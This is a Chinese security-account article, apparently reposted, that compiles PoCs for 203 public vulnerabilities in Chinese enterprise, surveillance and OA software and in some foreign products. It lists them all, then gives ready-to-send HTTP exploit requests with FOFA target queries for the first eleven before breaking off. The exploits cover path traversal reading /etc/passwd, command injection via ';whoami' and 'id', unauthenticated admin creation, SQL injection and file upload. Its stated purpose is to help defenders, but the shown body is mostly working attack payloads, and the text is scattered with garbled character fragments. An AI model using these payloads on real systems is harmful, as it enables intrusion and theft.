互联网公开漏洞整理202309-202406
7 H+ M" Q: o0 J8 A; V X道一安全 2024-06-05 07:41 北京" ~ e% x- o/ p
以下文章来源于网络安全新视界 ,作者网络安全新视界
* A. T! n1 S& v+ K! q- w( e! N- h b9 O2 ?/ y4 }. |' X
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
3 n4 q0 H2 J. x2 z. b- s d6 n1 O4 N# t* z
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
1 o+ Z D7 X, t' ^- w0 _
* Z {) `0 K' I4 v6 r安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
8 u L- B8 ]5 @% `
% I4 J" Z4 ?6 f# @文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
+ H9 w8 c- [5 w8 b8 ?! i1 c: q/ T0 H1 ]8 |# _/ X. G* v# i
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
+ @( r5 z7 g* h$ @, L& D- K: Q. K# l/ p' p, W" d9 V7 k
) ? Y- z/ D5 |. h M声明
+ P: s8 S+ v. V6 Q4 j- C5 u( D+ u' A) U5 s: S% C$ M4 P
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。$ b) s' B( x( s5 G9 x
* t5 `7 }9 z |2 I- ?有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。! h8 j. \' u! L- C7 ~' z
, }& p2 h! h4 d! B0 `3 c) i: W
) F( R( [. U j( q6 Y4 o) a9 ^- {4 i1 \
目录8 ?0 T) w: w# i' b: N
$ o; v& s# i) e' z
01$ }7 [9 h% a9 \- w! J
% P, f( w2 x; \9 ~3 t4 s- ?; n! S
1. StarRocks MPP数据库未授权访问 Z! [! [; ~( I8 i4 A
2. Casdoor系统static任意文件读取9 [9 B. G4 F$ U7 g- R3 h
3. EasyCVR智能边缘网关 userlist 信息泄漏' \, ? j4 n3 G! z( ? N( q
4. EasyCVR视频管理平台存在任意用户添加
+ c& J; R+ Z" D* w4 U5. NUUO NVR 视频存储管理设备远程命令执行
5 z z, x6 N7 ^3 \7 F; w6 j6 H9 Q F6. 深信服 NGAF 任意文件读取4 v' y7 P2 J j' ~, D4 ~
7. 鸿运主动安全监控云平台任意文件下载1 u* A B" f' h1 |2 Y
8. 斐讯 Phicomm 路由器RCE
" }3 _* L3 V0 t& h9. 稻壳CMS keyword 未授权SQL注入1 g" S. w3 ?% w* L! I% b( j
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
6 D/ E( A ^1 |; C11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入. Z* E' r a% B5 O: S
12. Jorani < 1.0.2 远程命令执行
/ |7 `. P$ }0 j0 P; Y9 J* i2 D' s13. 红帆iOffice ioFileDown任意文件读取) o3 O( n' ~6 F7 }9 U
14. 华夏ERP(jshERP)敏感信息泄露) d g f% t1 @% f
15. 华夏ERP getAllList信息泄露
- R3 t9 t M* b% ] \16. 红帆HFOffice医微云SQL注入9 y) z$ m/ [& B' h
17. 大华 DSS itcBulletin SQL 注入* ` E+ ]' Q; u) t Q" r
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露4 R* M$ }4 A6 P0 A* _/ [7 n
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
" u! I$ O* O. i: T- t20. 大华ICC智能物联综合管理平台任意文件读取, u$ P1 C5 M2 N' g- ]8 r. ]; D
21. 大华ICC智能物联综合管理平台random远程代码执行
+ K8 Z$ r& d' [' S6 ?' [: d+ P22. 大华ICC智能物联综合管理平台 log4j远程代码执行! R- `% ^# u7 ?4 r' P. D3 E
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
: _6 M g: k; {! J- V24. 用友NC 6.5 accept.jsp任意文件上传! R# A) M/ z3 F% u% y2 o3 A6 M% M
25. 用友NC registerServlet JNDI 远程代码执行 d1 V6 g* |7 j( R6 B! ]
26. 用友NC linkVoucher SQL注入
5 s* g! }! S7 }5 ]27. 用友 NC showcontent SQL注入9 l* v: M2 e2 R2 | l
28. 用友NC grouptemplet 任意文件上传4 X+ z9 M5 o9 _1 `0 ^% C
29. 用友NC down/bill SQL注入5 m$ E: f+ G' T+ ]+ g# }) E
30. 用友NC importPml SQL注入
' q0 @7 Y* h8 x) R9 k31. 用友NC runStateServlet SQL注入( |; m$ a0 q4 Z1 S9 }
32. 用友NC complainbilldetail SQL注入
* b w" n8 P' j+ r: p6 ^33. 用友NC downTax/download SQL注入
5 O6 M' b! N6 F0 v34. 用友NC warningDetailInfo接口SQL注入1 w4 T; _& f/ J9 Y0 [
35. 用友NC-Cloud importhttpscer任意文件上传
9 d: t/ j: |5 P9 ?- m3 p7 \36. 用友NC-Cloud soapFormat XXE
! \! b! z U4 l+ ]8 c37. 用友NC-Cloud IUpdateService XXE! w3 M& F3 N0 c/ @
38. 用友U8 Cloud smartweb2.RPC.d XXE
$ u7 I. R9 \% d1 g39. 用友U8 Cloud RegisterServlet SQL注入
* e; R# C/ p3 |8 B$ h$ P" ~( F40. 用友U8-Cloud XChangeServlet XXE' {6 @: ^& Y6 ~& d/ [1 {* f& ~6 r, h
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
4 L: S8 i$ r o. m7 E42. 用友GRP-U8 SmartUpload01 文件上传
& f) l7 t: o1 j; j* b43. 用友GRP-U8 userInfoWeb SQL注入致RCE
4 t1 G$ T1 T9 C1 z+ O- M: \7 k$ o2 _44. 用友GRP-U8 bx_dj_check.jsp SQL注入
6 H0 _& ~6 M' [# k+ m3 a45. 用友GRP-U8 ufgovbank XXE
|1 e' V& ^ m: Z46. 用友GRP-U8 sqcxIndex.jsp SQL注入& b O* `! L! Q0 w) g A
47. 用友GRP A++Cloud 政府财务云 任意文件读取
, J: m1 Q8 B# o$ O# F48. 用友U8 CRM swfupload 任意文件上传1 j+ k, g$ c) g0 a2 Y
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 W' U/ G0 ^! U: s50. QDocs Smart School 6.4.1 filterRecords SQL注入$ v0 @2 c# Y" x7 f
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, ] H: L/ e: Q, s
52. 泛微E-Office json_common.php sql注入
* r, S& N) R0 @$ v53. 迪普 DPTech VPN Service 任意文件上传
' @- {1 p5 G( N. q/ ^54. 畅捷通T+ getstorewarehousebystore 远程代码执行. `( B: y0 \, L- A+ \2 {
55. 畅捷通T+ getdecallusers信息泄露
$ s% e" f1 h, N+ K3 I0 q56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
+ @! I- I$ T0 {! }, o) [: X5 J57. 畅捷通T+ keyEdit.aspx SQL注入
# q3 ^4 H. {) I$ n1 ^/ p58. 畅捷通T+ KeyInfoList.aspx sql注入 j& F. m& ?, N6 z$ [; g
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* ]7 t; q1 f D8 Y$ a: X. v
60. 百卓Smart管理平台 importexport.php SQL注入2 X; Q& T! r& ]) [3 y. r* R& A. X
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
5 s% n1 {2 F0 {$ L/ ?! e62. IP-guard WebServer 远程命令执行
( N- d) [3 B- Y+ [' q& }4 A63. IP-guard WebServer任意文件读取
1 C, ^3 C% L$ Y64. 捷诚管理信息系统CWSFinanceCommon SQL注入
% j9 u: ]* ?* P# x+ k65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
6 l- f$ s& F" n3 F" n7 \66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
5 |$ n8 d9 J( c" X' R! K7 f2 l67. 万户ezOFFICE wpsservlet任意文件上传! l- u0 s: G( V3 r4 I
68. 万户ezOFFICE wf_printnum.jsp SQL注入
/ j6 n' _) y+ z8 @8 x5 [69. 万户 ezOFFICE contract_gd.jsp SQL注入% N# X |: P/ L$ Q! ]- [
70. 万户ezEIP success 命令执行
2 h( H0 N5 c0 T, s* Q# |! i71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入& p: U- ?- e( y& Q3 J" o/ w& g
72. 致远OA getAjaxDataServlet XXE' J% `* o5 d( q4 _" O
73. GeoServer wms远程代码执行
# Q; N' Q* L. k- c/ v5 w6 d, \) P74. 致远M3-server 6_1sp1 反序列化RCE
3 \1 v" r: b* B5 _: ?. f* b; f75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
1 b$ w1 @. \( m76. 新开普掌上校园服务管理平台service.action远程命令执行, J; c: }' O4 N, T* W; N2 F
77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 Z+ o" b& N, g g5 F# A* Z
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传. c6 Q/ R- t/ L5 R& a ~" F
79. BYTEVALUE 百为流控路由器远程命令执行
0 f) k. ^) Z0 C9 d80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传; k$ q- f2 w1 m, Z' J" x
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露! t6 w1 g0 m# c. S+ I; ?
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
3 E; z! s i m% a83. JeecgBoot testConnection 远程命令执行7 y- W, l" m9 x) x! Y
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入# E: [4 ]- m4 {* d2 j
85. SysAid On-premise< 23.3.36远程代码执行8 G5 N7 m7 d2 {8 f
86. 日本tosei自助洗衣机RCE8 C0 F. F* w$ ]4 J( X2 _
87. 安恒明御安全网关aaa_local_web_preview文件上传$ b1 W2 R7 y& ^9 p9 ]; q
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行% [2 u3 W9 w& T% h: y1 r
89. 致远互联FE协作办公平台editflow_manager存在sql注入% s4 T& ~4 _% L
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行! X6 l" l( Z" q+ g6 b# S
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取% h4 o5 t" H; f
92. 海康威视运行管理中心session命令执行( f+ V( ? q9 i, F o$ i; `
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传) |* @! p/ w9 ]
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
0 R$ f& f/ O( n6 U- @95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
: J+ u# T: a* c) \; w96. Apache OFBiz 18.12.11 groovy 远程代码执行
0 z1 {/ n' a% i9 h+ C9 M" y# |97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行1 _2 H+ W3 o$ F( R
98. SpiderFlow爬虫平台远程命令执行% x& s% o0 F* h' j7 k
99. Ncast盈可视高清智能录播系统busiFacade RCE% J) T, D4 Q9 M: E8 Z8 _3 }; p
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传 [2 u" }& q U! B
101. ivanti policy secure-22.6命令注入
8 d1 {! h2 M9 d; _102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行+ ~) ^7 X; Q- E
103. Ivanti Pulse Connect Secure VPN XXE
$ R7 S! J3 @! l0 O104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
: x/ b% `! [/ p1 n4 O3 ?105. SpringBlade v3.2.0 export-user SQL 注入& i; j/ f4 @- e8 N+ Q/ v! c
106. SpringBlade dict-biz/list SQL 注入2 Y5 ~& V8 ^2 H7 f
107. SpringBlade tenant/list SQL 注入
# f4 ?; |' R1 j5 T, g# }108. D-Tale 3.9.0 SSRF
) h2 A n3 [- I8 b" o5 F4 o# f109. Jenkins CLI 任意文件读取. z. e3 G* a. u+ B3 M+ q! z, V1 B% `0 V
110. Goanywhere MFT 未授权创建管理员
. y1 @% B d! }111. WordPress Plugin HTML5 Video Player SQL注入
) E# B6 U& ^. V$ }; u112. WordPress Plugin NotificationX SQL 注入& j# m( r2 j; t+ ?1 x K, z
113. WordPress Automatic 插件任意文件下载和SSRF; S) _$ H" N* k# s0 D" G
114. WordPress MasterStudy LMS插件 SQL注入( E8 \* F) e$ b& A) X/ O
115. WordPress Bricks Builder <= 1.9.6 RCE
" i: ]1 b# i( X116. wordpress js-support-ticket文件上传
0 L- j6 w. h0 p2 S# c& A117. WordPress LayerSlider插件SQL注入0 ~' q; {- L$ h( x7 k
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
$ D; n6 R4 X" T119. 北京百绰智能S20后台sysmanageajax.php sql注入5 \6 N* M' Y% z9 n$ a: D8 o
120. 北京百绰智能S40管理平台导入web.php任意文件上传% x, z {- j# V2 `; O
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
0 Z# a/ n1 N/ Q. n7 }7 Y9 ?) n$ l122. 北京百绰智能s200管理平台/importexport.php sql注入& E- M J( X5 B4 o! U! |1 S* L4 q
123. Atlassian Confluence 模板注入代码执行
7 s3 f) m$ V8 j; y5 _6 A! V- j124. 湖南建研工程质量检测系统任意文件上传
. u6 ^- `4 ]% i125. ConnectWise ScreenConnect身份验证绕过4 ^+ b0 B1 v! @
126. Aiohttp 路径遍历. H$ w* Q3 \8 b
127. 广联达Linkworks DataExchange.ashx XXE
- a& q# j2 J/ q# S128. Adobe ColdFusion 反序列化" k. r' y. W% `$ n/ i- m3 A) b
129. Adobe ColdFusion 任意文件读取
6 ^: x T6 h. T130. Laykefu客服系统任意文件上传
2 r5 e1 c' O7 ?4 A131. Mini-Tmall <=20231017 SQL注入/ m0 `) m f2 y( ?% ?: x' V
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过1 h5 \. f/ O q
133. H5 云商城 file.php 文件上传0 ]2 n# v7 L0 O" l4 e# M
134. 网康NS-ASG应用安全网关index.php sql注入! k: X& W: q" C6 y/ s5 b
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
. L& K) t- x. S/ H136. NextChat cors SSRF
- M) j* w0 T: K; U* d) I, @137. 福建科立迅通信指挥调度平台down_file.php sql注入
! k8 y- x: W+ z) e# y5 Y138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
6 m; w/ G9 ^4 g4 V# D139. 福建科立讯通信指挥调度平台editemedia.php sql注入
* L7 H+ S: Z, k140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
9 L9 J' ^$ h/ M141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入* h6 S- K+ u4 D0 ~
142. CMSV6车辆监控平台系统中存在弱密码
1 I* e8 g0 A' L) @. ~8 O143. Netis WF2780 v2.1.40144 远程命令执行
6 L8 M$ l/ O$ \. S9 M' ]; S0 O: r: i144. D-Link nas_sharing.cgi 命令注入) f+ y+ v, W4 P4 m. A. u# L: H$ P
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入5 @5 x$ z& |6 F" f. Z
146. MajorDoMo thumb.php 未授权远程代码执行
! Z. |0 B, @/ X147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
# g5 p0 h* a/ W# i! b! k148. CrushFTP 认证绕过模板注入
+ T* @+ n2 T1 ]' d h6 H: X149. AJ-Report开源数据大屏存在远程命令执行
4 Q) V3 {0 A- N3 l$ o150. AJ-Report 1.4.0 认证绕过与远程代码执行' a0 I% v7 ]0 N1 u
151. AJ-Report 1.4.1 pageList sql注入0 S. P) P8 [: H: V
152. Progress Kemp LoadMaster 远程命令执行4 f$ z* j9 z5 E8 l) l
153. gradio任意文件读取$ n$ U9 @1 @! r: U3 ~- J0 U$ l( E" J* t
154. 天维尔消防救援作战调度平台 SQL注入
& l9 X5 O' i1 N# {155. 六零导航页 file.php 任意文件上传2 y- ]) w! M. g1 [7 f
156. TBK DVR-4104/DVR-4216 操作系统命令注入
8 [ W$ }' L4 R8 C157. 美特CRM upload.jsp 任意文件上传" t$ y1 \2 T- j2 c) v- j! i' K
158. Mura-CMS-processAsyncObject存在SQL注入
% X5 R. C- u% M2 J4 c& Z4 n4 A159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传6 p- s3 b, Q3 E S6 T
160. Sonatype Nexus Repository 3目录遍历与文件读取
& |: B/ @1 b' J3 |0 W7 V161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传9 Q/ X6 q: q' p8 Z6 i4 X
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传% I: b* F& x1 v+ W% j) s9 i
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传3 E+ Q3 t1 M/ |& q% M" f0 H6 q
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
4 |0 E, h. Z: L% c+ C; ~165. OrangeHRM 3.3.3 SQL 注入 Z2 k* m0 T! [" |
166. 中成科信票务管理平台SeatMapHandler SQL注入
! b6 Y& g- i8 m! _1 Z167. 精益价值管理系统 DownLoad.aspx任意文件读取
3 _" i3 ^6 x7 b9 ?0 C7 x168. 宏景EHR OutputCode 任意文件读取
' g; T) W' y. s. h8 R5 [7 s( Y169. 宏景EHR downlawbase SQL注入
/ N4 h& z8 A( ?7 @( B: w170. 宏景EHR DisplayExcelCustomReport 任意文件读取5 m1 [" g. J$ |/ o. i6 M( k- c ^6 m
171. 通天星CMSV6车载定位监控平台 SQL注入4 o8 W- t4 X0 V- `- U
172. DT-高清车牌识别摄像机任意文件读取* A7 C. b& k+ b3 B
173. Check Point 安全网关任意文件读取2 S: e- M. f1 l9 I/ v1 f
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
, f$ {+ y/ i3 P$ W" ?175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入9 l! o; Z. p6 F) x% l1 e7 p& }$ J- Z
176. 电信网关配置管理系统 rewrite.php 文件上传. N5 q7 E. n5 D% L/ Z3 e
177. H3C路由器敏感信息泄露, N7 a2 i( E8 ^* j2 E2 V) c
178. H3C校园网自助服务系统-flexfileupload-任意文件上传) Q% m; C' D0 A! V- d
179. 建文工程管理系统存在任意文件读取" h0 {% g: y4 [, F" k
180. 帮管客 CRM jiliyu SQL注入' t4 c- ]0 T' u5 x- ?8 C
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入! z( U& E Q& }% V$ X: F
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建( T" W, Y) @% p$ c I4 F
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入* E- M, f$ q; z- |9 m
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加8 g3 _3 s; u) b2 ]3 Q
185. 瑞友天翼应用虚拟化系统SQL注入
' n, g: `* Z8 K% H5 @; Q. R186. F-logic DataCube3 SQL注入; D* q! H; ]/ i) J' S
187. Mura CMS processAsyncObject SQL注入
& j9 O1 Q7 g$ o( s+ _! C' M! Y188. 叁体-佳会视频会议 attachment 任意文件读取9 Z- N$ a1 V+ i
189. 蓝网科技临床浏览系统 deleteStudy SQL注入" t" A* N. E8 F6 Q2 g" e# r
190. 短视频矩阵营销系统 poihuoqu 任意文件读取3 g0 h) k( ]$ P' a( b6 \' t
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
6 y. _' N$ _% F6 a192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 p& ~3 q! u7 Y" U# |
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
, i. c3 T' {' n+ W194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
: |5 t2 `) m$ V3 E/ o$ S% G4 k195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
5 w4 e/ x7 u6 Y5 w f2 A) L196. 河南省风速科技统一认证平台密码重置 t! ~2 ?' _: Z3 Y$ B
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入& b% i4 ~8 f/ v3 m. ~
198. 阿里云盘 WebDAV 命令注入) f7 ?7 r3 t! ?0 m
199. cockpit系统assetsmanager_upload接口 文件上传
$ T% J7 @- {9 p7 ]200. SeaCMS海洋影视管理系统dmku SQL注入8 Z: F# e6 ]1 i0 H* o- e" e: y
201. 方正全媒体新闻采编系统 binary SQL注入5 j" a0 O1 g7 {5 {3 a
202. 微擎系统 AccountEdit任意文件上传
' Q7 }& {% `6 ~0 M203. 红海云EHR PtFjk 文件上传) A$ C+ e+ j6 e/ a& m4 O5 z4 s8 [8 M
- Z: a: N* d _' s4 j
POC列表6 I, U% Z% B& z
+ d: I3 L3 O3 m( _
02
F' w& A8 Q8 d( o6 A+ S7 W2 r- l% h( ]/ m
1. StarRocks MPP数据库未授权访问; X9 e% H, W5 J
FOFA :title="StarRocks"
' M1 L- G4 G Y5 zGET /mem_tracker HTTP/1.17 M$ F' J, v4 Q# C. r: @ m
Host: URL
* X9 R; L7 f" [4 A* x% |4 J* W
& Z& K# t4 Z" r- l2 e3 l4 B, G0 s8 \
2. Casdoor系统static任意文件读取
- r7 c9 j9 V. uFOFA :title="Casdoor"
0 C* k# `- w* ^+ M8 cGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1% T# u6 o1 H: \0 ^+ h! c
Host: xx.xx.xx.xx:9999# S% \" c2 G7 P- U; H" ~+ ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ q0 `$ y0 H8 oConnection: close8 |/ I7 B `* I, {
Accept: */*8 G# W7 M( {) \2 h
Accept-Language: en6 ^+ e2 m& |- z6 T
Accept-Encoding: gzip
3 v2 ^. k$ v6 v9 f& N
: t) a2 ?) i' t. s) | T
3 z$ E9 F" |7 H4 O K3. EasyCVR智能边缘网关 userlist 信息泄漏
2 b2 n3 f7 q+ s1 |FOFA :title="EasyCVR"
* m& R6 J& T- X" e t( fGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" c, u I; O: v' I8 }; o9 T8 c
Host: xx.xx.xx.xx" }/ t9 o! ~% ]8 ~+ q
: \2 H3 i6 x0 ?# w
7 H* U- Q( }+ J0 D% f/ b4. EasyCVR视频管理平台存在任意用户添加( e5 h9 h9 T9 N5 ~) Y# {
FOFA :title="EasyCVR"
" @* [3 o4 {6 [9 d/ @$ r) f7 i, N' R4 m. m$ g" n
password更改为自己的密码md5! ?) X1 @& I n, N+ ?9 w( k D
POST /api/v1/adduser HTTP/1.12 A/ [- X0 \, c% n2 c+ R# r3 I
Host: your-ip
4 O" Z) z, E/ H8 R7 Z% hContent-Type: application/x-www-form-urlencoded; charset=UTF-83 n1 f+ e; \; @* Z# ?4 u& ^" c$ j( D
; W% J5 e3 U9 K& d: Ename=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=15 F5 k( e0 L. i: y
7 J5 d# S! _9 C- s2 ~' b" V) R2 c6 v' P) C$ Q: a% I0 i
5. NUUO NVR 视频存储管理设备远程命令执行6 ]1 L: W E) `7 M/ [5 N0 j
FOFA:title="Network Video Recorder Login"* R# p! _# L9 b+ I. Q/ `% q
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1( ]! ~/ z Y1 n" w3 A' M/ T
Host: xx.xx.xx.xx
, ^/ E! U% G; Z. d3 h0 F9 Y/ @. z+ h5 w, ] K3 M! s
9 @5 Q4 Y! P2 [6. 深信服 NGAF 任意文件读取0 t' e$ e# }8 l8 R; d( k9 g* ]% R1 v
FOFA:title="SANGFOR | NGAF", g( k+ Q) k# @7 k3 C
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.13 e4 X! g$ d0 Z" U& D
Host:
7 A5 g* @. `! m+ x- ]5 ?1 Y& I( C; b- _* \
|4 F+ f9 q: I \- q2 S
7. 鸿运主动安全监控云平台任意文件下载8 q& {2 Q7 d' t/ I3 F
FOFA:body="./open/webApi.html"
% j! S4 I D- [3 E0 MGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
, B$ Q2 ~3 Z# nHost:
5 B; t5 J* s: S9 C6 n: \. ~9 L4 k5 s8 K) `8 M3 F
3 K8 p. `+ J( p1 {% W2 ~
8. 斐讯 Phicomm 路由器RCE; O8 U, l) C% n2 g8 S3 n
FOFA:icon_hash="-1344736688"/ @; j4 D! ?9 \7 _! p( q
默认账号admin登录后台后,执行操作
3 Z3 \9 e9 G1 y0 Z! a jPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1$ x% A" B! q0 F& v0 E) v6 W
Host: x.x.x.x$ v2 O" G0 c: K' R
Cookie: sysauth=第一步登录获取的cookie
! |! Y6 h0 L$ f5 dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz' W0 g2 Q; u) R P `
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
: T. V; _; [- b3 z2 f3 S0 w! n A" S$ ]7 ]
------WebKitFormBoundaryxbgjoytz% b+ ~- k# s6 o, G9 |# X" G0 d
Content-Disposition: form-data; name="wifiRebootEnablestatus"6 a: e, P; ?6 c4 J
9 } P7 w! { M2 w+ Y- \# D; @0 N9 {%s
( G) F: L$ |' d% m( C8 `% l' @------WebKitFormBoundaryxbgjoytz3 \+ ]# O$ j- U6 c6 t
Content-Disposition: form-data; name="wifiRebootrange"
7 m- v) ~- t$ i: O% P5 @! [ \* \# l6 o% e
12:00; id;
0 c# Y5 P4 a& L( E7 w* q------WebKitFormBoundaryxbgjoytz
3 K4 g& X: r2 GContent-Disposition: form-data; name="wifiRebootendrange" b/ Q7 d9 t* e9 y; i, e; H
/ R" [& n a: T) s" f1 d+ D: k4 W% g+ B%s:
+ \8 P5 E: ~1 b) d8 R% D2 `------WebKitFormBoundaryxbgjoytz
8 _0 O; W: j0 a3 p* FContent-Disposition: form-data; name="cururl2"
# D4 P( {& b- ~& u3 ~: r) k# l) s% z1 i6 K7 }0 q$ `! d
; B/ O! M+ h" A! ~. P; X/ \ j------WebKitFormBoundaryxbgjoytz--
6 a! V( |- M. k+ n1 Q% Y' c/ e8 ^% |9 Y4 b3 r8 n) B' T+ ?
1 o" K5 o& D& Y# V
9. 稻壳CMS keyword 未授权SQL注入 D/ V' _% J* F6 \6 s4 [
FOFA:app="Doccms"9 D$ k9 A& j( U4 p
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
0 v% U9 }8 P+ }Host: x.x.x.x4 i& N) [0 V Z
+ y; E9 c# ?9 H, t3 h( ^" S: c" ?( n& F2 h
payload为下列语句的二次Url编码
/ f2 P2 H0 a% n$ N7 v- H/ q' Z% B( d+ z$ P3 G c
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#+ Q$ W& m6 E* C( E6 f+ ]( `
2 S7 n! W% E" y, a10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
" a- ?' P+ E, h& kFOFA:icon_hash="953405444"( }5 Z% A3 C0 a9 ?% @/ ?4 J
- l' M0 z6 ~$ f7 U c: K
文件上传后响应中包含上传文件的路径
1 O1 x. U& Y$ _5 x& ]5 i3 ~ YPOST /eis/service/api.aspx?action=saveImg HTTP/1.1( L& B3 `. l$ O, ~
Host: x.x.x.x:xx
L1 n' F3 M& i; |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36% v! O. R2 F9 A9 D# e* O
Content-Length: 197
5 n# `1 D1 d& o/ K3 x" Q IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
. z; z# N+ i% R4 ^2 SAccept-Encoding: gzip, deflate2 c3 O# K1 `% f
Accept-Language: zh-CN,zh;q=0.9
0 o( u+ x& V" [! jConnection: close
2 c- M# P. E* G7 b* y7 c# K9 oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu* T5 ~; ], \/ M R: @6 x
% W/ @- O( }/ q, x9 }: j
------WebKitFormBoundaryxdgaqmqu$ c5 @! \4 f, [0 `/ R
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
# v) @# o. I4 }5 v5 N& ~8 d+ bContent-Type: text/html
' R: h$ |& e: S# w1 G2 P4 _6 e3 a( \- g
jmnqjfdsupxgfidopeixbgsxbf9 E `( i; g# M. h- N; o, [1 y) _
------WebKitFormBoundaryxdgaqmqu-- M* `8 R( E9 P6 \: Z. J- S
4 F' w$ X: n8 }1 c( F! Y% a$ m- }% o' @) e5 [0 _2 {
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
& y) w9 I( a `$ R) r- @FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
% s8 R4 V/ [) z2 z4 `; Y3 _8 ~8 TGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1+ v) x) D# y( }. l4 O4 k1 K. s
Host: 127.0.0.1$ f! {- E( t; N3 x
